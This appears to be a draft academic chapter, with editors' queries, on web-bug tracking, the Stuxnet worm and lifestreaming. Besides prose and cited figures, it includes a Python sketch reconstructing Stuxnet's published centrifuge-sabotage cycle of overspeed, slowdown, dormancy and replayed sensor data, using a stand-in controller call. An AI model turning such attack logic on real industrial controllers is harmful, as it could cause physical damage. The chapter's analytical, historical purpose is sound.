&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, each unique visitor to [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) generates $189, each unique visitor to [http://www.businessinsider.com/blackboard/google Google] (search) generates $24, and although Facebook (social networking) is only generating $4 per unique visitor, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed, in testimony to a U.S. House of Representatives subcommittee, that it was ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation, and keeps a low profile in order to avoid attracting unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header, and there is currently no legal requirement that they do so in the US or elsewhere (W3C, 2012). One can, though, see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
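&lt;br /&gt;
It is worth noting how technically slight the 'do not track' mechanism is: the flag is a single HTTP request header, DNT: 1, which a receiving server is free to honour or to ignore. The following minimal Python sketch sends the header; example.com is a placeholder URL, and 'Tk', the tracking status response header from the W3C draft, may simply be absent: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of the 'do not track' flag: one request header,
# with nothing in the protocol to enforce compliance. The URL is a
# placeholder; 'Tk' is the tracking status header of the W3C draft.
import urllib.request

req = urllib.request.Request('http://example.com/')
req.add_header('DNT', '1')            # signal the opt-out preference
with urllib.request.urlopen(req) as resp:
    # Whether the server actually refrains from tracking is
    # invisible here; it may simply ignore the header.
    print(resp.status, resp.headers.get('Tk'))
&amp;lt;/pre&amp;gt;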
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking system will only become more invasive and aggressive in collecting data from our everyday lives and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in the use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection, and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so that an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
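&lt;br /&gt;
The attack logic Zetter describes can be rendered schematically. The following Python sketch is a reconstruction from that published description only, and emphatically not Stuxnet's actual code, which ran on Siemens PLCs; the frequencies and delays are those reported above, whilst the function names and the stand-in controller interface are illustrative assumptions: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A schematic reconstruction of the attack sequence Zetter describes,
# NOT Stuxnet's actual code (which ran on Siemens PLCs). Frequencies
# and delays are those reported above; the rest is illustrative.
import itertools, time

NOMINAL_HZ = 1064
DAY = 24 * 60 * 60

def set_frequency(hz):
    # stand-in for a write to the frequency-converter controller
    print('drive frequency set to', hz, 'Hz')

def overspeed_attack():               # stress the rotors at 1,410 Hz
    set_frequency(1410)
    time.sleep(15 * 60)               # hold for 15 minutes
    set_frequency(NOMINAL_HZ)

def nearstall_attack():               # 50 minutes down at 2 Hz
    set_frequency(2)
    time.sleep(50 * 60)
    set_frequency(NOMINAL_HZ)

# Meanwhile, the man-in-the-middle element replays recorded sensor
# data to the operators, so the console shows nominal values.
for attack in itertools.cycle([overspeed_attack, nearstall_attack]):
    time.sleep(27 * DAY)              # lie dormant for 27 days
    attack()
&amp;lt;/pre&amp;gt;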
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have had to work on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to provide a stealth infection of the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed slowly to reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuges and faked industrial process control sensor signals by modeling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Hypotheses about the origin of Stuxnet have been drawn from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentence reads better] was a close reading and reconstruction of the programming logic, undertaken by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel was involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
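&lt;br /&gt;
The first step of such a close reading, before any disassembly proper, is typically to extract the printable strings from the binary; it is in this way that artefacts such as the 'b:\myrtus\...' project path quoted in note [9] come to light. A minimal sketch in Python, in which 'sample.bin' is a placeholder filename rather than a real malware sample: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of string extraction, the usual first step of the
# close reading described above; 'sample.bin' is a placeholder name.
import re

with open('sample.bin', 'rb') as f:
    data = f.read()

# scan for runs of six or more printable ASCII bytes
for match in re.finditer(rb'[ -~]{6,}', data):
    text = match.group().decode('ascii')
    # flag any string mentioning the telltale 'myrtus' project path
    if 'myrtus' in text.lower():
        print(hex(match.start()), text)
&amp;lt;/pre&amp;gt;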
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
